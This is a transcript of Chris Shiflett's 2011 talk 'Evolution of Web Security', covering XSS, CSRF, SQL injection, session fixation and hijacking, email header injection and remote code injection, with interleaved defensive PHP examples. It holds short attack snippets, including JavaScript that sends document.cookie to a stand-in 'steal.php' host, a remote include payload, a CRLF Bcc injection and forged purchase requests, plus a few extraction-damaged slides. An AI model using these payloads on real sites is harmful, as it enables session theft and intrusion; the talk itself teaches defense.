Evolution of Web Security

Chris Shiflett
September 26, 2011

This is a multi-faceted tutorial that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I demonstrate how traditional exploits are being combined together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Transcript

  1. Evolution of
    Web Security
    Chris Shiflett
    @shiflett ▪ shiflett.org

  2. Who am I?
    Web craftsman from Brooklyn, NY, and
    founding member of Analog, a web design
    & development co-operative.

  3. 1. Fundamentals

  4. Three Principles
    Defense in depth
    — Redundant safeguards are valuable.
    Least privilege
    — Grant as little freedom as possible.
    Least complicated
    — Complexity breeds mistakes.

  5. Two Practices
    Filter input.
    — Ensure data coming in is valid.
    Escape output.
    — Ensure data going out is not misinterpreted.

  6. Filter input. Escape output.
    (diagram: Filter → Application → Escape)

  7. <?php
    $clean = array();
    if (ctype_alpha($_POST['name'])) {
        $clean['name'] = $_POST['name'];
    } else {
        /* Error */
    }
    ?>

  8. <?php
    $clean = array();
    switch ($_POST['color']) {
        case 'red':
        case 'green':
        case 'blue':
            $clean['color'] = $_POST['color'];
            break;
        default:
            /* Error */
            break;
    }
    ?>

  9. <?php
    $clean = array();
    $colors = array('red', 'green', 'blue');
    if (in_array($_POST['color'], $colors)) {
        $clean['color'] = $_POST['color'];
    } else {
        /* Error */
    }
    ?>

  10. <?php
    $clean = array();
    $colors = array();
    $colors['red'] = '';
    $colors['green'] = '';
    $colors['blue'] = '';
    if (isset($colors[$_POST['color']])) {
        $clean['color'] = $_POST['color'];
    } else {
        /* Error */
    }
    ?>

  11. <?php
    $clean = array();
    if (preg_match('/^\d{5}$/', $_POST['zip'])) {
        $clean['zip'] = $_POST['zip'];
    } else {
        /* Error */
    }
    ?>

  12. <?php
    /* Content-Type: text/html; charset=UTF-8 */
    $html = array();
    $html['user'] = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8');
    echo "Welcome, {$html['user']}.";
    ?>

  14. Exploits
    Cross-Site Scripting
    Cross-Site Request Forgeries
    SQL Injection
    Session Fixation
    Session Hijacking
    Email Injection
    Remote Code Injection

  15. Cross-Site Scripting
    (diagram: Attacker, Target, Victim; XSS and HTML arrows, steps 1 and 2)

  16. echo $_GET['user'];
    http://host/foo.php?user=%3Cscript%3E…
    echo '…';

  17. Steal Cookies
    document.location =
    'http://host/steal.php?cookies=' +
    encodeURI(document.cookie);

  18. Steal Passwords
    document.forms[0].action =
    'http://host/steal.php';

  19. Steal Saved Passwords
    [form markup lost in extraction; only two hidden-field fragments remain:]
    style="display: none" />
    style="display: none" />

  20. Short & Simple

  21. Character Encoding
    $string = "alert('XSS');";
    $string = mb_convert_encoding($string, 'UTF-7');
    echo htmlentities($string);
    Google XSS Example
    http://shiflett.org/blog/2005/dec/google-xss-example

  22. FIEO.
    Use valid HTML.
    — http://validator.w3.org/
    Use existing solutions.
    — PHP developers, use htmlentities() or htmlspecialchars().
    — Make sure you indicate the character encoding!
    Need to allow HTML?
    — Use HTML Purifier, even if you’re not using PHP:
    http://htmlpurifier.org/
    Stop It!
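
The escaping practice from slides 12, 21 and 22 carried through, as an added example that is not part of the deck: escape for the HTML context with ENT_QUOTES and an explicit UTF-8 charset, and send the matching Content-Type header so the browser never guesses the encoding. The helper name h() and the sample inputs are chosen here.

```php
<?php
// Added example, not from the slides: escape output for an HTML body and a
// quoted attribute, and declare the charset, which is what defuses the
// UTF-7 trick on slide 21. h() is a helper name chosen here.
declare(strict_types=1);

// Tell the browser the encoding explicitly so it never guesses (UTF-7 etc.).
header('Content-Type: text/html; charset=UTF-8');

/** Escape a string for use as HTML text or inside a quoted attribute. */
function h(string $s): string
{
    // ENT_QUOTES escapes both ' and "; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: two classic payloads and the UTF-7 form.
$samples = [
    "<script>alert('XSS')</script>",
    '" onmouseover="alert(1)',
    '+ADw-script+AD4-alert(1)+ADw-/script+AD4-',
];

foreach ($samples as $raw) {
    echo '<p>Welcome, ' . h($raw) . ".</p>\n";
    echo '<input type="text" name="user" value="' . h($raw) . "\" />\n";
}
// The first two samples come back as &lt;, &gt;, &quot; and &#039; entities.
// The UTF-7 sample has no special characters, so h() passes it through
// unchanged; it is inert only because the Content-Type header above stops
// the browser from auto-detecting UTF-7.
```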

  23. Cross-Site Request Forgeries
    (diagram: Attacker, Victim, Target; CSRF arrow, steps 1 and 2)

  24. Because the attack is carried out by
    the victim, CSRF can bypass:
    — HTTP auth
    — Session-based auth
    — Firewalls
    — &c.
    CSRF

  25. Buy
    [form markup lost in extraction; the hidden field fragment remains:]
    value="059600656X" />

    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    isbn=059600656X

  26. Forging GET
    GET /buy.php?isbn=059600656X HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234

  27. Forging POST
    document.buy.submit();

    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    isbn=059600656X

  28. Digg (Fixed)
    http://4diggers.blogspot.com/
    Amazon (Fixed?)
    http://shiflett.org/amazon.php
    CSRF Exploits

  29. Steal Cookies (Improved)
    new Image().src =
    'http://host/steal.php?cookies=' +
    encodeURI(document.cookie);

  30. Stop It!
    <?php
    $token = md5(uniqid(rand(), TRUE));
    $_SESSION['token'] = $token;
    $html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8');
    ?>
    <input type="hidden" name="token" value="<?php echo $html['token']; ?>" />
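
Issuing the token is only half of the defence; the request handler must also check it. Added example, not from the deck: the token is created with random_bytes() instead of the slide's md5(uniqid(rand(), TRUE)), compared with hash_equals(), and the buy form from slides 25 and 27 is shown with the field in place. csrf_token(), csrf_field() and verify_csrf_token() are names chosen here.

```php
<?php
// Added example, not from the slides: issue a per-session CSRF token and
// verify it on POST. random_bytes() replaces the slide's md5(uniqid())
// construction; function names are chosen here, not from the deck.
declare(strict_types=1);
session_start();

/** Return the session's token, creating one on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['token'])) {
        $_SESSION['token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['token'];
}

/** Hidden input for every state-changing form (escaped output). */
function csrf_field(): string
{
    $html = htmlentities(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="token" value="' . $html . '" />';
}

/** True only when the submitted token matches the session's token. */
function verify_csrf_token(array $post): bool
{
    if (empty($_SESSION['token']) || !isset($post['token'])
        || !is_string($post['token'])) {
        return false;
    }
    // Constant-time comparison: response timing leaks nothing about the token.
    return hash_equals($_SESSION['token'], $post['token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // The forged requests on slides 26 and 27 carry no token and stop here.
    if (!verify_csrf_token($_POST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid token.');
    }
    /* process the purchase of $_POST['isbn'] here */
} else {
    echo '<form method="post" action="buy.php" name="buy">'
       . '<input type="hidden" name="isbn" value="059600656X" />'
       . csrf_field()
       . '<input type="submit" value="Buy" /></form>';
}
```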

  31. SQL Injection
    (diagram: Attacker, Target, Database; SQL arrows, steps 1 and 2)

  32. SELECT count(*)
    FROM users
    WHERE username = '{$_POST['username']}'
    AND password = '…'

    Input: chris' /*

    SELECT count(*)
    FROM users
    WHERE username = 'chris' /*'
    AND password = '…'

  33. FIEO.
    Use prepared statements.
    — PHP developers, use PDO.
    Stop It!
    addslashes() Versus mysql_real_escape_string()
    http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
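
The login query from slide 32 rewritten with a PDO prepared statement, as an added example that is not the deck's own code. The DSN, credentials, the password_hash column and the password_verify() step are assumptions made here; the point is that the placeholder keeps the slide's payload as data.

```php
<?php
// Added example, not from the slides: the slide 32 login query with PDO.
// DSN, credentials and the password_hash column are assumptions.
declare(strict_types=1);

$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    // Real server-side prepares rather than client-side emulation.
    PDO::ATTR_EMULATE_PREPARES => false,
]);

/**
 * Look up the user by name only; the password is checked against a
 * stored hash in PHP and never compared inside the SQL statement.
 */
function authenticate(PDO $pdo, string $username, string $password): bool
{
    // The bound value "chris' /*" is sent as a string parameter, so it
    // cannot close the quoted literal or start a comment.
    $stmt = $pdo->prepare(
        'SELECT password_hash FROM users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $hash = $stmt->fetchColumn();

    return $hash !== false && password_verify($password, (string) $hash);
}

// With the slide's payload the query looks for a user literally named
// "chris' /*", finds none, and authentication fails.
if (!authenticate($pdo, "chris' /*", 'anything')) {
    echo "Login refused\n";
}
```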

  34. Session Fixation
    http://host/login.php?PHPSESSID=1234

  35. Regenerate the session identifier.
    — PHP developers, session_regenerate_id(TRUE).
    Do this whenever the privilege level
    changes.
    Stop It!

  36. Session Hijacking
    Attacker impersonates a victim.
    In PHP, by default, this only requires a valid
    session identifier.
    Session identifier obtained using:
    — Prediction
    — Capture
    — Fixation

  37. Understand how sessions work.
    Minimize session identifier exposure.
    — SSL
    — Separate domain for embedded resources
    Trending
    — https://panopticlick.eff.org/
    — More on this later…
    Stop It!
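
Slides 35 and 37 put into code, as an added example that is not from the deck: regenerate the identifier whenever the privilege level changes and keep the cookie off plain HTTP and away from scripts. login_user() and logout_user() are names chosen here; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example, not from the slides: regenerate the session identifier on
// login and logout, and limit how the cookie can be exposed or planted.
// login_user() and logout_user() are names chosen here.
declare(strict_types=1);

// Cookie flags limit identifier exposure: HTTPS only, not readable by JS.
session_set_cookie_params([
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
// Refuse identifiers the server never issued, so a planted
// ?PHPSESSID=1234 (slide 34) does not become a live session.
ini_set('session.use_strict_mode', '1');
ini_set('session.use_only_cookies', '1');
session_start();

/** Call after the credentials have been verified. */
function login_user(int $userId): void
{
    // TRUE deletes the old session data, so whoever holds the old
    // identifier is left with a dead session.
    session_regenerate_id(true);
    $_SESSION['user_id']  = $userId;
    $_SESSION['login_at'] = time();
}

/** On logout, drop the data and issue a fresh, anonymous identifier. */
function logout_user(): void
{
    $_SESSION = [];
    session_regenerate_id(true);
}
```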

  38. Email Injection
    mail('[email protected]', 'Feedback', '...',
    "From: {$_POST['email']}");

    $_POST['email'] = [email protected]\r\nBcc: [email protected]\r\nBcc: …

    To: [email protected]
    Subject: Feedback
    From: [email protected]
    Bcc: [email protected]
    Bcc: …

  39. FIEO.
    — http://iamcal.com/publish/articles/php/parsing_email
    — PHP developers, use ctype_print() as defense in depth.
    Stop It!
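
The defense-in-depth check from slide 39 applied to the slide 38 mail() call, as an added example that is not from the deck: ctype_print() rejects the CR/LF that carries the extra Bcc: lines, and filter_var() adds a structural check. clean_email() and the recipient address are chosen here.

```php
<?php
// Added example, not from the slides: validate the address before it goes
// into a mail header, so CR/LF cannot introduce extra Bcc: lines.
// clean_email() is a name chosen here; the recipient is a placeholder.
declare(strict_types=1);

/** Return the address if it is a single, printable, well-formed email. */
function clean_email(string $raw): ?string
{
    // ctype_print() is false for \r, \n and any other control character.
    if ($raw === '' || !ctype_print($raw)) {
        return null;
    }
    // Second layer: one local part, one domain, nothing else.
    $valid = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

$clean = [];
$raw   = $_POST['email'] ?? '';
$email = is_string($raw) ? clean_email($raw) : null;
if ($email === null) {
    /* Error */
    exit('Invalid email address.');
}
$clean['email'] = $email;

// Only the filtered value reaches the header.
mail('feedback@example.com', 'Feedback', '...', "From: {$clean['email']}");
```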

  40. Remote Code Injection
    (diagram: Attacker, Target)

  41. include "{$_COOKIE['type']}.php";
    Cookie: type=http://host/inject.inc?
    include "http://host/inject.inc?.php";

  42. This example exploits allow_url_fopen.
    PHP 5 has allow_url_include.
    — By default, allow_url_include is disabled.
    Remote Code Injection

  43. include "{$_GET['type']}.php";

    POST /script.php?type=php://input%00 HTTP/1.1
    Host: host
    Content-Type: application/x-www-form-urlencoded
    Content-Length: ?

    ?

    include "php://input";

  44. FIEO.
    — If at all possible, use a white list.
    Stop It!

  45. 2. Emerging Trends

  46. Ajax
    “The name is shorthand for Asynchronous
    JavaScript + XML, and it represents a
    fundamental shift in what’s possible on
    the Web.”
    — Jesse James Garrett

  47. Ajax
    “Client-side techniques & technologies
    that allow two-way communication
    between the client and the server without
    reloading the page.”

  48. Cross-Domain Ajax
    (diagram: Victim, Target; JS)
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token

  49. XSS + Ajax + CSRF
    (diagram: Victim, Target; XSS)
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token

  50. XSS is a perfect platform for CSRF.
    CSRF attacks can exploit XSS
    vulnerabilities.
    Victims can become attackers.
    Rinse. Repeat.
    Worms

  51. Browser Hijacking
    http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking
    Myspace CSRF and XSS Worm (Samy)
    http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy

  52. Cross-Domain Ajax
    Thanks, Flash!

  53. Cross-Domain Ajax
    domain="*"   API domain       Vulnerable?
    No           yahoo.com        No
    No           youtube.com      No
    Yes          api.flickr.com   No
    Yes No       adobe.com        Yes No   (row garbled in extraction)

  54. JavaScript Hijacking
    (diagram: Attacker, Victim, Target; CSRF arrow, steps 1 to 4)

  55. [{"email": "[email protected]"}]
    JavaScript Hijacking Demo
    http://mochikit.com/fortify_fud/

  56. JavaScript Hijacking
    “If you audit your application for CSRF
    flaws, you’ve defeated this attack.
    Moreover, the well-known, pre-existing
    exploits for CSRF are actually worse than
    this attack.”
    — Thomas Ptacek

  57. 3. Ideas for the Future

  58. Trending
    Panopticlick
    https://panopticlick.eff.org/
    “When you visit a web site, you are
    allowing that site to access a lot of
    information about your computer’s
    configuration. Combined, this information
    can create a kind of fingerprint — a
    signature that could be used to identify
    you and your computer.”

  59. Trending
    “Not the intent, but Panopticlick from @eff
    would be useful for preventing session
    hijacking.”
    — http://twitter.com/shiflett/status/8562663352

  60. Establish trends to help detect
    anomalies.
    Trends can be based on identity or
    behavior.
    Trending is imperfect; use as defense in
    depth.
    Trending
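
One way to turn the trending idea of slides 37, 58 and 60 into a session-hijacking check, as an added example that is not from the deck: record an identity-based baseline at login and treat a later mismatch as an anomaly that forces re-authentication. request_fingerprint(), record_baseline() and matches_baseline() are names chosen here, and the header values are constructed samples.

```php
<?php
// Added example, not from the slides: an identity-based trend check.
// At login we record a hash of request attributes that rarely change
// within a session; a later mismatch is treated as an anomaly and the
// user is sent back to the login form. Function names are chosen here.
declare(strict_types=1);

/** Build a coarse fingerprint from headers that are stable mid-session. */
function request_fingerprint(array $server): string
{
    $parts = [
        $server['HTTP_USER_AGENT'] ?? '',
        $server['HTTP_ACCEPT_LANGUAGE'] ?? '',
        // The client IP is left out on purpose: mobile users change networks.
    ];
    return hash('sha256', implode("\n", $parts));
}

/** Record the baseline right after a successful login. */
function record_baseline(array &$session, array $server): void
{
    $session['fp'] = request_fingerprint($server);
    $session['last_seen'] = time();
}

/**
 * True when the request looks like the session's owner. Trending is
 * imperfect, so a mismatch should trigger re-authentication, not a ban.
 */
function matches_baseline(array $session, array $server): bool
{
    if (!isset($session['fp'])) {
        return false;
    }
    return hash_equals($session['fp'], request_fingerprint($server));
}

// Constructed sample: the baseline captured at login ...
$session = [];
record_baseline($session, [
    'HTTP_USER_AGENT'      => 'Mozilla/5.0 (X11; Linux x86_64)',
    'HTTP_ACCEPT_LANGUAGE' => 'en-US',
]);
// ... and a later request carrying the same cookie from a different client.
$later = ['HTTP_USER_AGENT' => 'curl/7.80', 'HTTP_ACCEPT_LANGUAGE' => 'en-US'];
if (!matches_baseline($session, $later)) {
    // Defense in depth: the cookie alone no longer proves identity here.
    echo "Anomaly detected: re-authentication required\n";
}
```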

  61. Slides
    http://shiflett.org/evolution-of-web-security.pdf
    http://slideshare.net/shiflett

  62. Follow me on Twitter.
    — @shiflett
    Comment on my blog.
    — shiflett.org
    Email me.
    — chris@shiflett.org
    Work with me.
    — analog.coop
    Feedback?
